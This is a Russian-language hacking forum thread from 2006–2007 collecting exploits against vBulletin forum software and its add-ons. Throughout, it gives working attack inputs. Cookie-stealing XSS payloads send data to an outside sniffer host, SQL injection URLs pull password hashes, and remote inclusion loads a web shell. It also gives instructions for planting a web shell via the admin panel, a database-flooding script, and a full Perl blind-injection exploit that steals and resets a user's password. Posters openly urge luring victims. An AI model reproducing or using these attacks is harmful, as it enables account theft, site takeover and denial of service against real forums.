Форумы [Обзор уязвимостей vBulletin]

Discussion in 'Уязвимости CMS/форумов' started by bandera, 19 Aug 2006.

  1. bandera

    bandera Banned

    Joined:
    2 Jun 2006
    Messages:
    58
    Likes Received:
    37
    Reputations:
    11
    ВНИМАТЕЛЬНО ЧИТАЕМ ПРАВИЛА ПРЕЖДЕ ЧЕМ ЗАДАТЬ ВОПРОС!

    На форуме есть обзоры уязвимостей ipb и phpbb, я решил сделать обзор уязвимостей vBulletin-). Итак начну.
    Рассмотрим уязвимости трёх веток воблы: 2.*.*, 3.0.* и 3.1.*.

    Узнаём версию форума.

    В папке /clientscript/ находятся несколко js и css файлов в которых можно посмотреть точную версию форума.
    Code:
    [COLOR=YellowGreen]vbulletin_ajax_threadslist.js
    vbulletin_ajax_namesugg.js
    vbulletin_attachment.js
    vbulletin_cpcolorpicker.js
    vbulletin_editor.js
    Пример:[/COLOR]
    Code:
    [COLOR=YellowGreen]www.xz.сom/forumpath/clientscript/vbulletin_editor.css[/color]

    vBulletin 2

    2.2.* - 2.2.4 - Выполнение произвольного кода
    Описание уязвимости: уязвимость в vBulletin's Calendar PHP сценарии (calender.php) позволяет удаленному атакующему выполнять произвольный код в контексте пользователя 'nobody'.
    Exploit: http://www.securitylab.ru/vulnerability/source/207147.php


    2.3.* - SQL injection
    Описанте уязвимости: уязвимость в проверке правильности входных данных в 'calendar.php'. Удаленный пользователь может внедрить произвольные SQL команды.
    Пример:
    Code:
    [COLOR=YellowGreen]www.xz.сom/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate[/COLOR]
    2.*.* - XSS
    Описание уязвимости: уязвимость существует из-за недостаточной обработки тэга email.
    Exploit:
    Code:
    [COLOR=YellowGreen][E*MAIL][email protected]"'s='[/E*MAIL]' sss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss));[/COLOR]
    Video: http://video.antichat.ru/file57.html





    vBulletin
    3.0

    3.0.0 - XSS
    Описание уязвимости: уязвимость существует в сценарии search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
    Пример:
    Code:
     [COLOR=YellowGreen]www.xz.сom/forumpath//search.php?do=process&showposts=0&query=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    [/COLOR]
    3.0-3.0.4 - Выполнение произвольных команд
    Описание уязвимости: уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе.
    Пример:
    Code:
    [COLOR=YellowGreen]www.xz.сom/forumpath/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."[/COLOR]
    О командах читать здесь: http://forum.antichat.ru/threadnav7345-1-10.html

    3.0.3–3.0.9 XSS
    Описание уязвимости: уязвимость существует при обработке входных данных в поле Статус. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
    Примечание: менять свой статус по умолчанию может только администрация, начиная от группы Модераторы.
    Пример:
    Code:
     [COLOR=YellowGreen]<body onLoad=img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;>[/COLOR]
    3.0.9 and 3.5.4 - XSS
    Описание уязвимости: звимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
    Пример:
    Code:
    [COLOR=YellowGreen]www.xz.сom/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&posthash=c8d3fe38b082b6d3381cbee17f1f1aca&poststarttime='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%2B'&sbutton=%D1%EE%E7%E4%E0%F2%FC+%ED%EE%E2%F3%FE+%F2%E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3&postpoll=yes&polloptions=1234&openclose=1&stickunstick=1&iconid=0[/COLOR]
    


    vBulletin 3.5

    3.5.2 - XSS
    Описание уязвимости: Уязвимость существует при обработке входных данных в поле "title" в сценарии "calendar.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
    Пример:
    Code:
    [COLOR=YellowGreen]TITLE:--------->Test<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
            BODY:---------->No matter
            OTHER OPTIONS:->No matter[/COLOR]
    Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>, смотрим ссылку на наше событие и впариваем её тому у кого хотим украсть cookie.

    3.5.3 - XSS
    Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в поле "Email Address" в модуле "Edit Email & Password". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
    Примечание: удачная эксплуатация уязвимости возможна при включенных опциях "Enable Email features" и "Allow Users to Email Other Member".
    Пример:
    Code:
    [COLOR=YellowGreen]www.xz.сom/forumpath/profile.php?do=editpassword
            pass:your pass
            email: [email protected]”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt
            Note About lenght limitation 
            ****
            forum/profile.php?do=editoptions
            Receive Email from Other Members=yes
            ****
            www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}[/COLOR]
    Пояснение: заходим в профиль и в поле email прописываем [email protected]”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt. Cохраняем. Потом ставим в опциях свой емайл видимым для всех. Теперь втравливаем кому нибудь ссылку www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}, где {your id} ваш id. Cookie уйдут на снифер.

    3.5.4 - Дамп БД
    Описание уязвимости: уязвимость существует из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'. Удаленный пользователь может с помощью специально сформированного URL сделать дамп базы данных приложения.
    Пример:
    Code:
    [COLOR=YellowGreen]www.xz.com/forumpath/install/upgrade_301.php?step=SomeWord[/COLOR]

    3.5.4 - XSS

    Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
    Пример:
    Code:
     [COLOR=YellowGreen]www.xz.сom/forumpath/inlinemod.php?do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a[/COLOR]
    



    Уязвимости в модулях vBulletin.

    vBug Tracker 3.5.1 - XSS
    Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "sortorder" сценария vbugs.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
    Пример:
    Code:
    [COLOR=YellowGreen]www.xz.сom/forumpath/vbugs.php?do=list&s=&textsearch=&vbug_typeid=0&vbug_statusid=0&vbug_severityid=0&vbug_versionid=0&assignment=0&sortfield=lastedit&sortorder=%22%3Cscript%3Eimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%3C/script%3E[/COLOR]
    ImpEx 1.74 - PHP-инклюдинг и выполнение команд
    Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "systempath" в сценарии ImpExData.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
    Пример:
    Code:
    [COLOR=YellowGreen](1)
    www.xz.сom/forumpath/impex/ImpExData.php?systempath=http://rst.void.ru/download/r57shell.txt
    www.xz.сom/forumpath/impex/ImpExData.php?systempath=../../../../../../../../etc/passwd
    (2)
    www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id
    (3)
    www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id
    (4)
    www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id
    [/COLOR]
    Exploit: http://www.securitylab.ru/vulnerability/source/264410.php

    ibProArcade 2.x - SQL injection
    Описание уязвимости: Уязвимость существует в модуле “Report” при обработке входных данных в параметре user сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
    Пример:
    Code:
    [COLOR=YellowGreen]www.xz.сom/forumpath/index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user][/COLOR]
    Где [any_user] id нужного нам юзера.



    При использовании XSS c указанным в теме снифером. Логи смотреть тут: http://antichat.ru/sniff/log.php
    Но лучше завести себе свой снифер -). Это можно сделать тут: http://antichat.ru/sniffer или тут: http://s.netsec.ru.





    Шелл в vBulletin.

    Разберёмся как залить шелл из админки воблы.


    Способ заливки шелла в vBulletin 2.*.* и 3.0.*
    1. Заходим в админку.
    2. Смайлы.
    3. Загрузить смайл.
    4. Грузим наш шелл. (папка по умолчанию /images/smilies)
    5. Заходим www.xz.сom/forumpath/images/smilies/shell.php
    Примечание: сработает не везде.


    Способ заливки шелла в vBulletin 3.5.*.

    1. Заходим в админку.
    2. Система модулей.
    3. Добавить новый модуль.
    Продукт: ставим vBulletin
    Месторасположение: Vbulletin: Справка - faq_complete
    Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
    4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда



    Видео по теме:

    http://video.antichat.ru/file105.html
    http://video.antichat.ru/file95.html
    http://video.antichat.ru/file57.html
    http://video.antichat.ru/file3.html






    З.Ы. Сильно не ругаться. Если где-то был не прав, исправляем, если что-то упустил, добавляем... Не стал вылаживать некоторые XSS т.к. версия форума у них повторяется...
     
    #1 bandera, 19 Aug 2006
    Last edited by a moderator: 25 Oct 2014
    27 people like this.
  2. flipper

    flipper Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    131
    Likes Received:
    85
    Reputations:
    29
    Passive XSS vBulletin 3.6.x Admin Control Painel

    еще дополнение:
    Code:
    Author: insanity
    E-mail: [email protected]
    
    XSS vBulletin 3.6.1 Admin Control Panel
    
    http://www.exemplo.com/vbulletin/admincp/index.php?do=buildnavprefs&nojs=0&prefs="><script>alert("insanity")</script>
    http://www.exemplo.com/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script>alert("insanity")</script>
    
     
    #2 flipper, 13 Nov 2006
    Last edited by a moderator: 3 Sep 2008
    3 people like this.
  3. LoneWolf666

    LoneWolf666 Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    207
    Likes Received:
    121
    Reputations:
    12
    Backup SQL-Dump Bypass vBulletin 3.5.х

    www.xz.com/forumpath/install/upgrade_301.php?step=backup

    вот это не стесняйтесь смело подставлять ко всей линейке 3.5.х, особливо к 3.5.1, проверено.

    Уязвимы особенно нуленые версии vBulletin
     
    #3 LoneWolf666, 16 Nov 2006
    Last edited by a moderator: 3 Sep 2008
    2 people like this.
  4. Mr_Necromancer

    Joined:
    21 Nov 2006
    Messages:
    25
    Likes Received:
    10
    Reputations:
    -9
    VBulletin 3.6.4 [FLASH] (SWF) XSS

    VBulletin 3.6.4

    Уязвимость позволяет удаленному злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при обработке входящих запросов. Атакующий может выполнить SWF произвольный сценарий и выкрасть данные аутентификации cookie.

    Пример:

    Code:
    getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
    Информация по эксплуатации уязвимости описана ниже
    http://forum.antichat.ru/showpost.php?p=558935&postcount=28
     
    #4 Mr_Necromancer, 27 Dec 2006
    Last edited by a moderator: 3 Sep 2008
    1 person likes this.
  5. Abra

    Abra Member

    Joined:
    17 Sep 2005
    Messages:
    278
    Likes Received:
    51
    Reputations:
    29
    Active XSS TopXStats

    В список "уязвимости модулей" не плохо было бы так же добавить дыру в моде TopXStats (Статистика Х лучших). Ее легко узнать - в низу форума есть таблица с послденимим затронутыми темами. лучшими авторами и .т.п, таблица так и называется "Статистика лучших".
    Пару месяцев назад там нашли дыру - не было фильтрации выходных данных, вернее на выходе данные спокойно трансформировались в html
    Достаточно создать тему в заголовке которой указать код редиректинга на свой сайт, и псевдодефейс готов. Через meta redirect например. Тогда с гл. страници пользователей будет перенаправлять на ваш дефейс.
    Для дыры достаточно скоро был выложен патч на Vbulletin.net.ru , но не все его установили, и некоторые все еще ставят старую версию хака (не пропатченную). Так что флаг вам в руки.

    Вместо meta redirect'a можно так же вставить сниффер, но поле "тема" имеет ограничение на кол-во символов, так что может не поместиться.
     
    #5 Abra, 2 Jan 2007
    Last edited by a moderator: 3 Sep 2008
    1 person likes this.
  6. Mr_Necromancer

    Joined:
    21 Nov 2006
    Messages:
    25
    Likes Received:
    10
    Reputations:
    -9
    эксплоит для флуда форума

    Вот прикольный эксплоит для флуда форума.
    Конечно это не поможет при взломе. но всётаки достаточно серьёзный баг.

    Code:
    <?
    set_time_limit(60);
    //You can change 10 to other numbers  
    for($i = 1 ; $i <= 10 ; $i++)
    {
    //to put curl to send POST request 
    $ch = curl_init();
    //change http://localhost/vb3 to the url of the script 
    curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');
    curl_setopt($ch , CURLOPT_POST , 1) ;
    curl_setopt($ch , CURLOPT_POSTFIELDS , 'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&passwordconfirm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gmail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST corrections always on&options[showemail]=1');
    curl_exec($ch);
    curl_close($ch);
    }
    //Flood finished  good luck 
    ?>
    
    Кстати видел данный эксплоит на перле, он реализован с помощю сокетов, работает гораздо быстрее (не показывает каждый раз форму регистрации), и соответственно кушает меньше трафика.

    В принципе с помощю этого скрипта переполнить базу данных и остановить работу форума и даже сайта, т.к большинство хостеров ставят ограничение на обьём базы данных, достигнув который, в базу данных уже ничего нельзя будет записать, не почистив её.
     
    #6 Mr_Necromancer, 22 Jan 2007
    Last edited by a moderator: 3 Sep 2008
  7. Mr_Necromancer

    Joined:
    21 Nov 2006
    Messages:
    25
    Likes Received:
    10
    Reputations:
    -9
    Active XSS [attachment.php] vBulletin 3.x

    Вот свеженький баг, сам не проверял.

    Программа: vBulletin 3.x

    Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в поле формы «Extension» сценарием admincp/attachment.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

    Автор: semu
    Дата: 08.02.2007 21:15:43

    Чтобы юзать - должен быть доступ к админке, вобщем пригодиться конечно может в некоторых случаях.
     
    #7 Mr_Necromancer, 9 Feb 2007
    Last edited by a moderator: 3 Sep 2008
    1 person likes this.
  8. Mr_Necromancer

    Joined:
    21 Nov 2006
    Messages:
    25
    Likes Received:
    10
    Reputations:
    -9
    XSRF vBulletin 3.0.0

    Вот ещё для полноты темы:

    Робит только vBulletin 3.0.0 Beta 2

    Уязвимость в проверке правильности ввода обнаружена в vBulletin при просмотре честных сообщений. Удаленный пользователь может выполнить XSS нападение.

    Сообщается, что сценарий private.php не фильтрует данные, представленные пользователем. Удаленный пользователь может сконструировать специально сформированную Web форму, которая, при загрузке в браузере пользователя, выполнить произвольный код сценария в браузере целевого пользователя в контексте vBulletin сайта. Пример: (требуется предварительная авторизация)

    Code:
    <html>
    <body>
    <form action="http://[victim]/forum/private.php" method="post" name="vbform">
    <input type="hidden" name="do" value="insertpm" />
    <input type="hidden" name="pmid" value="" />
    <input type="hidden" name="forward" value="" />
    <input type="hidden" name="receipt" value="0" />
    <input type="text" class="bginput" name="title" value="" size="40" tabindex="2"/>
    <textarea name="message" rows="20" cols="70" wrap="virtual" tabindex="3"></textarea>
    <input type="submit" class="button" name="sbutton" value="Post Message" accesskey="s" tabindex="4" />
    <input type="submit" class="button" value="Preview Message" access key="p" name="preview" onclick="this.form.dopreview = true; return true;this.form.submit()" tabindex="5">
    <input type="checkbox" name="savecopy" value="1" id="cb_savecopy" checked="checked"/> 
    <input type="checkbox" name="signature" value="1" id="cb_signature" />
    <input type="checkbox" name="parseurl" value="1" id="cb_parse url" checked="checked" />
    <input type="checkbox" name="disablesmilies" value="1" id="cb_disablesmilies" />
    </form>
    <script>
    //Set Values and Submit
    // You can write your own JS codes
    var xss = "\"><script>alert(document.cookie)<\/script>";
    document.vbform.title.value=xss;
    document.vbform.preview.click();
    </script>
    </body>
    </html>
    
    Уязвимость обнаружена в vBulletin 3.0.0 Beta 2.
     
    #8 Mr_Necromancer, 9 Feb 2007
    Last edited by a moderator: 3 Sep 2008
    1 person likes this.
  9. Mr_Necromancer

    Joined:
    21 Nov 2006
    Messages:
    25
    Likes Received:
    10
    Reputations:
    -9
    Code EXEC vBulletin 3.0.6

    Помойму этого тоже не было ,если не ошибаюсь:

    Программа: vBulletin 3.0.6 и более ранние версии

    Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе с привилегиями web-сервера. Уязвимость существует при обработке имен шаблонов в сценарии 'misc.php' при включенной опции 'Add Template Name in HTML Comments' (не является значением по умолчанию). Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный код на системе.

    Пример:
    Code:
    http://[target]/misc.php?do=page&template={${phpinfo()}}
    Этот и предыдущий пост хорошо-бы перенести в начало темы, к ранним версиям воблы.
     
    #9 Mr_Necromancer, 9 Feb 2007
    Last edited by a moderator: 3 Sep 2008
  10. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege

    vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege (Требуются привилегии супермодератора)
    http://milw0rm.com/exploits/3387

    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «postids» сценарием inlinemod.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    http://www.xakep.ru/post/36982/default.asp
     
    _________________________
    #10 +toxa+, 1 Mar 2007
    Last edited by a moderator: 3 Sep 2008
    1 person likes this.
  11. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Ссылки на темы связанные с безопастностью (уязвимостями) vBulletin.

    Vbulletin 3.6.x:

    Нападение XSS на Vbulletin 3.6.x для НОВИЧКОВ.

    ----------------------------------------------------------

    Все сообщения не содержащие информационной ценности или не имеющие прямого отношения к теме удалены.

    ----------------------------------------------------------

    Ещё раз напомню, что в этой теме обзор уязвимостей форума, сообщения не имеющие информационной ценности ("Немогли бы взглянуть на этот форум", "Подскажите версию" и т.д.) будут удаляться.
     
    #11 Grey, 2 Mar 2007
    Last edited: 2 Mar 2007
    3 people like this.
  12. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    Vbulletin Petz module all version

    Не смог найти тему куда выложить сплойт, выложил сюда, если что модеры перенесите.

    Вообщем сплойт дёргает пароль у заданного юзера, если сплойт не остановить, то он этому юзеру еще и сменит пароль. Новый пароль из хеша состоит только из цифр размером 8 символов.

    Code:
    #!/usr/bin/perl 
    
    # Vbulletin module Petz with sql-injection.
    # coded by k1b0rg(768620)
    #
    # This exploit changing your buyer. 
    # A new password consists of figures, the length of 8 and going to take a great brut of time(passwords pro);) 
    # If you do not need to change the password, simply stop exploit at the time of the removal of the password. 
    # Running exploit again sent two letters to the box. Be akkuratney. 
    # In the first test of vulnerability when sql error, the box webmaster sent a letter of error. Be akkuratney.
    # 
    # dork: inurl:petz.php
    #
    # download module: http://dev.p3tz.com/
    #
    # Lamers go to жопа.
    # exp: perl petz.pl -uhttp://forumteen.net/diendan/ -i1
    #
    # needly:
    # mysql >=4
    # magic_quotes off
    # direct hands
    #
    # greets: antichat.ru mini-rinok.ru
    #
    
    use LWP::UserAgent;
    use Getopt::Std;
    use strict;
    my %opts;
    
    getopts("i:p:l:P:s:e:u:",\%opts);
      my $url=$opts{u};
      my $id=$opts{i} || 9107;
      my $prefix=$opts{P} || '';
      my $password1=$opts{p};
      my $salt1=$opts{s};
      my $length=$opts{l};
      my $email1=$opts{e};
    
    
    if(!$url || !$id)
    {
    echo('-------------------------FUCK YOU SPILBERG!----------------------');
    echo('Petz sql injection');
    echo('Founded and coded by k1b0rg(768620)');
    echo('exp: perl petz.pl -uhttp://forumteen.net/diendan/ -i1');
    echo('-------------------------FUCK YOU SPILBERG!----------------------');
    exit;
    }
    
    
    
    
    my $browser = LWP::UserAgent->new();
    $browser->requests_redirectable([]);
    
    echo('Petz sql injection');
    echo('Founded and coded by k1b0rg(768620)');
    ########check on vuln and getting prefix#######################################
    echo('[\] Step 0: [Checking vuln]');
    my $res=$browser->get($url.'petz.php?do=view&id=9995681\'');
    if($res->content=~/Database error/i)
    {
    echo('[|] This script is vulnerable!!!!');
    $res->content=~/LEFT JOIN (.*?)user/i;
    echo('[/] Prefix is: ['.$1.']');
    }
    else
    {
    echo('[|] This script NOT vulnerable!!!!');
    exit;
    }
    
    
    
    
    ########password1#######################################
    echo('[-] Step 1: [getting password(one) user by id ['.$id.']');
    echo('[\] Password(1): [');
    if(!$password1)
      {
       for(1..32)
        {
          my $pos=$_;
          for(48..57,97..103)
            {
              my $asc=$_;
              if($asc==103) {echo('EXPLOIT FAILED]',0); exit;}
              my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'user+WHERE+userid=\''.$id.'\'+and(ascii(substring(password,'.$pos.',1))='.$asc.')/*');
              if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); last; }
            }
       }
      }
    else
     {
      echo($password1,0);
     }
    echo(']',0);
    
    ########salt1#######################################
    echo('[|] Step 2: [getting salt(one) user by id ['.$id.']');
    echo('[-] Salt(1): [');
    my $salt;
    if(!$salt1)
     {
       for(1..3)
        {
          my $pos=$_;
          for(33..126)
            {
             my $asc=$_;
             my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'user+WHERE+userid=\''.$id.'\'+and(ascii(substring(salt,'.$pos.',1))='.$asc.')/*');
             if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $salt.=chr($asc); last; }
            }
       }
      }
    else
      {
        $salt=$salt1;
        echo($salt,0);
      }
    echo(']',0);
    
    
    ########Checking email length#######################################
    echo('[\] Step 3: [Checking email length ['.$id.']');
    echo('[|] Email length: [');
    my $num;
    if(!$email1)
      {
        if(!$length)
          {
            for(6..32)
              {
                $num=$_;
                my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'user+WHERE+userid=\''.$id.'\'+and(length(email)='.$num.')/*');
                if($res->content!~/Untrapped Error/is) {echo($num,0); last; }
              }
          }
        else
          {
            $num=$length;
            echo($num,0);
          }
      }
    else
      {
        $num=length($email1);
        echo($num,0);
      }
    echo(']',0);
    
    ########losting email#######################################
    echo('[/] Step 4: [getting email user by id ['.$id.']');
    echo('[-] Email: [');
    my $email;
    if(!$email1)
      {
        for(1..$num)
          {
            my $pos=$_;
            for(48..57,64,97..122)
              {
                my $asc=$_;
                my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'user+WHERE+userid=\''.$id.'\'+and(ascii(lower(substring(email,'.$pos.',1)))='.$asc.')/*');
                if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $email.=chr($asc); last; }
              }
          }
      }
    else
      {
        $email=$email1;
        echo($email,0);
      }
    echo(']',0);
    
    ########lost_password#######################################
    echo('[\] Step 5: [Losting password]');
    $browser->post($url.'login.php',
                  [
                  email=>$email,
                  do=>'emailpassword'
                  ]);
    
    ########losting activationid#######################################
    echo('[|] Step 7: [getting activationid user by id ['.$id.']');
    echo('[/] activationid: [');
    my $valid;
    for(1..8)
      {
        my $pos=$_;
        for(48..57)
          {
            my $asc=$_;
            my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'useractivation+WHERE+userid=\''.$id.'\'+and(ascii(substring(activationid,'.$pos.',1))='.$asc.')/*');
            if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $valid.=chr($asc); last; }
          }
      }
    echo(']',0);
    
    
    ########lost_password#######################################
    echo('[-] Step 8: [Losting password]');
    $browser->get($url.'login.php?a=pwd&u='.$id.'&i='.$valid);
    
    
    ########password2#######################################
    echo('[\] Step 9: [getting password(two) user by id ['.$id.']');
    echo('[|] Password(2): [');
    my $newhash;
    for(1..32)
      {
        my $pos=$_;
        for(48..57,97..102)
          {
            my $asc=$_;
            my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'user+WHERE+userid=\''.$id.'\'+and(ascii(substring(password,'.$pos.',1))='.$asc.')/*');
            if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $newhash.=chr($asc); last; }
          }
      }
    echo(']',0);
    
    
    echo('News hash && salt: ['.$newhash.':'.$salt.']');
    
    
    sub echo{
      my $text=shift;
      my $param=shift;
      my $razdel=($param eq 0)?'':"\n";
      syswrite STDOUT,$razdel.$text;
    }
    
    
     
    #12 k1b0rg, 11 Mar 2007
    Last edited: 13 Mar 2007
    4 people like this.
  13. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    Passive XSS [downloads.php] vBulletin 3.6.2

    vBulletin 3.6.2

    Пассивная хсс

    Уязвим параметр "id" скрипта "downloads.php"
    Пример:
    http://forum.asechka.ru/downloads.php?do=cat&id=5"><script>alert()</script>
     
    #13 freddi, 17 Apr 2007
    Last edited by a moderator: 3 Sep 2008
    4 people like this.
  14. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    XSS [PDF] vBulletin 3.0.7 - 3.6.2

    vBulletin 3.0.7 - 3.6.2

    Активная хсс

    прикрепляем файл pdf созданный с содержанием:
    Code:
    <script>alert()</script>
    и при открытии этого файла вылезает алерт.

    этот способ работает в очень многих местах, также как и встраивание кода в картинку. минус этого способа, что не во всех местах можно прикреплять файлы.
     
    #14 freddi, 29 Apr 2007
    Last edited by a moderator: 3 Sep 2008
    3 people like this.
  15. Mr_Necromancer

    Joined:
    21 Nov 2006
    Messages:
    25
    Likes Received:
    10
    Reputations:
    -9
    Active XSS in Title vBulletin 3.5.2

    Программа: vBulletin 3.5.2

    http://www.securitylab.ru/vulnerability/source/243694.php

    Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре «title» сценарием calendar.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

    Code:
    TITLE:--------->Test<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
            BODY:---------->No matter
            OTHER OPTIONS:->No matter
    Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>, смотрим ссылку на наше событие и впариваем её тому у кого хотим украсть cookie.
     
    #15 Mr_Necromancer, 18 May 2007
    Last edited by a moderator: 3 Sep 2008
    1 person likes this.
  16. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    vBulletin 3.0.10
    SQL Injection

    Code:
    http://123.com/portal.php?id=54&a=viewfeature&featureid=99999/**/UNION/**/SELECT/**/0,1,2,3,4,username,6,7,8,9,10,11,12,password/**/from/**/user/**/where/**/userid=1/*
    vBulletin 3.0.6

    Command Execution Exploit (metasploit)

    Code:
    ##
    #        Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
    #    Name: php_vb3_0_6.pm
    # License: Artistic/BSD/GPL
    #         Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
    #
    #
    #  - This is an exploit module for the Metasploit Framework, please see
    #     http://metasploit.com/projects/Framework for more information.
    ##
    
    package Msf::Exploit::php_vb3_0_6;
    use base "Msf::Exploit";
    use strict;
    use Pex::Text;
    use bytes;
    
    my $advanced = { };
    
    my $info = {
            'Name'     => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
            'Version'  => '$Revision: 1.0 $',
            'Authors'  => [ 'str0ke' ],
            'Arch'     => [ ],
            'OS'       => [ ],
